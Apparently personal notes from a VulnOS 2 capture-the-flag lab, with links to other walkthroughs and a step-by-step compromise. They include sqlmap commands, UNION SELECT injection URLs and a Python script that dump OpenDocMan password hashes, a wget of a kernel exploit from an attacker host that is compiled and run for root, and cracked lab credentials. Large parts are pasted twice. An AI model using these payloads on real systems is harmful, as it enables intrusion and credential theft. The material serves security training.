Walkthru:
1. https://www.youtube.com/watch?v=s_hlPdWUGLQ [opendocman, Drupal metaexploit didn't work]
2. https://medium.com/@Kan1shka9/vulnos-2-walkthrough-16b70b9fbe17 [same as above. details in text/pix format]
3. https://www.rastating.com/vulnos-2-ctf-walkthrough/ [use python script instead of sqlmap to extract username and hash from DB]
4. https://samueldussault.com/vulnhub/pwning-vulnos-v2-what-do-you-think-of-a-i/ [crafting URL using browser instead of using SQLMAP, droopescan]
Notes:
Notes:
1. nmap shws 80, 22 and IRC 6667
1a. ran Metasploit against 6667 *unreal ircd 3281 backdoor) exploit but didnt work (wasnt getting any session).
2. index hrml shows /jbac/ folder. Ran nikto against the folder and found many folders including robots.txt.
2a. Opened many folders but not very helpful
3. Under the documentation tab, found a hidden comment (searched for SPAN word to possibly help find the comments) which was commented out due to security reason. It revealed another app called Opendocman on the server. looking at the Opendocman site also shows application version
4. Apprears that there are some exploit for opendocman (e.g. cp /usr/share/exploitdb/platforms/php/webapps/32075.txt 32075.txt). In the exploit the sqlmap is not very explicit so I used from the video
4a.sqlmap --dbms MySQL -u 'http://172.16.2.41/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' --batch
4b.sqlmap --dbms MySQL -u 'http://172.16.2.41/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' --batch -D jabcd0cs -T odm_user --dump
(tried without batch parameter and sqlmap asked a few question such do you wan to ccreack pwd , add suffix to pwd or which dictionary to us. with batch it didnt ask)
last sqlmap command shows user/pwd for guest and admin in hash
or use the following syntax
#sqlmap -u "http://192.168.106.3/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --level=3
#sqlmap -u "http://192.168.106.3/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --level=3 -D jabcd0cs --tables
#sqlmap -u "http://192.168.106.3/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --level=3 -D jabcd0cs -T odm_user --dump
5. You can now unhash the pwd and login as webmin/webmin1980.
6. You could also here enable different file type to see if webshell works. Alternatively, login using ssh with the account
7. Upon checking the kernel , it is vulnerable [https://www.exploit-db.com/exploits/37292/], download and copy it to victim machine , compile and chmod 777 and run it to get root access.
7a. wget http://172.16.2.38/37292.c
7b. gcc 37292.c -o 372
7c. chmod 777 372
7d. ./372... got root
4. https://samueldussault.com/tag/walkthrough/ [crafting URL using browser instead of using SQLMAP]
Instead of using SQLMAP, here we craft special URL to extract user, pwd (using 32075 vulnerability)
Looking up the software used online, I quickly found this exploit-db post, which describes two major flaws: https://www.exploit-db.com/exploits/32075/. Using the post to craft a special URL, I was then able to confirm that the application was vulnerable to this attack by listing the database tables as follow:
http://172.16.2.41/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
http://172.16.2.41/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,table_name,3,4,5,6,7,8,9 from information_schema.tables
http://172.16.2.41/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,password,3,4,5,6,7,8,9 from odm_user
===
from source
3. https://www.rastating.com/vulnos-2-ctf-walkthrough/ [use python script instead of sqlmap to extract username and hash from DB]
1. https://www.youtube.com/watch?v=s_hlPdWUGLQ [opendocman, Drupal metaexploit didn't work]
2. https://medium.com/@Kan1shka9/vulnos-2-walkthrough-16b70b9fbe17 [same as above. details in text/pix format]
3. https://www.rastating.com/vulnos-2-ctf-walkthrough/ [use python script instead of sqlmap to extract username and hash from DB]
4. https://samueldussault.com/vulnhub/pwning-vulnos-v2-what-do-you-think-of-a-i/ [crafting URL using browser instead of using SQLMAP, droopescan]
Notes:
Notes:
1. nmap shws 80, 22 and IRC 6667
1a. ran Metasploit against 6667 *unreal ircd 3281 backdoor) exploit but didnt work (wasnt getting any session).
2. index hrml shows /jbac/ folder. Ran nikto against the folder and found many folders including robots.txt.
2a. Opened many folders but not very helpful
3. Under the documentation tab, found a hidden comment (searched for SPAN word to possibly help find the comments) which was commented out due to security reason. It revealed another app called Opendocman on the server. looking at the Opendocman site also shows application version
4. Apprears that there are some exploit for opendocman (e.g. cp /usr/share/exploitdb/platforms/php/webapps/32075.txt 32075.txt). In the exploit the sqlmap is not very explicit so I used from the video
4a.sqlmap --dbms MySQL -u 'http://172.16.2.41/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' --batch
4b.sqlmap --dbms MySQL -u 'http://172.16.2.41/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' --batch -D jabcd0cs -T odm_user --dump
(tried without batch parameter and sqlmap asked a few question such do you wan to ccreack pwd , add suffix to pwd or which dictionary to us. with batch it didnt ask)
last sqlmap command shows user/pwd for guest and admin in hash
or use the following syntax
#sqlmap -u "http://192.168.106.3/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --level=3
#sqlmap -u "http://192.168.106.3/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --level=3 -D jabcd0cs --tables
#sqlmap -u "http://192.168.106.3/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --level=3 -D jabcd0cs -T odm_user --dump
5. You can now unhash the pwd and login as webmin/webmin1980.
6. You could also here enable different file type to see if webshell works. Alternatively, login using ssh with the account
7. Upon checking the kernel , it is vulnerable [https://www.exploit-db.com/exploits/37292/], download and copy it to victim machine , compile and chmod 777 and run it to get root access.
7a. wget http://172.16.2.38/37292.c
7b. gcc 37292.c -o 372
7c. chmod 777 372
7d. ./372... got root
4. https://samueldussault.com/tag/walkthrough/ [crafting URL using browser instead of using SQLMAP]
Instead of using SQLMAP, here we craft special URL to extract user, pwd (using 32075 vulnerability)
Looking up the software used online, I quickly found this exploit-db post, which describes two major flaws: https://www.exploit-db.com/exploits/32075/. Using the post to craft a special URL, I was then able to confirm that the application was vulnerable to this attack by listing the database tables as follow:
http://172.16.2.41/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
http://172.16.2.41/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,table_name,3,4,5,6,7,8,9 from information_schema.tables
http://172.16.2.41/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,password,3,4,5,6,7,8,9 from odm_user
===
from source
3. https://www.rastating.com/vulnos-2-ctf-walkthrough/ [use python script instead of sqlmap to extract username and hash from DB]
Rather than use this to traverse the database schema, I took a look at the GitHub Project and found the database schema (https://gist.github.com/rastating/3153cec9de24fa995a069abe99e75c1d)
I then wrote a small Python script to dump the usernames and password hashes from the
odm_user table using the SQL injection:import requests
import re
p = re.compile('value=999\s>(.+?)<\/option')
r = requests.get("http://10.2.0.104/jabcd0cs/ajax_udf.php", params={ 'q': "1", "add_value": "odm_user UNION SELECT 999, concat(username, 0x3a, password), 3,4,5,6,7,8,9 from odm_user" })
for m in re.finditer(p, r.text):
print m.group(1)
Comments
Post a Comment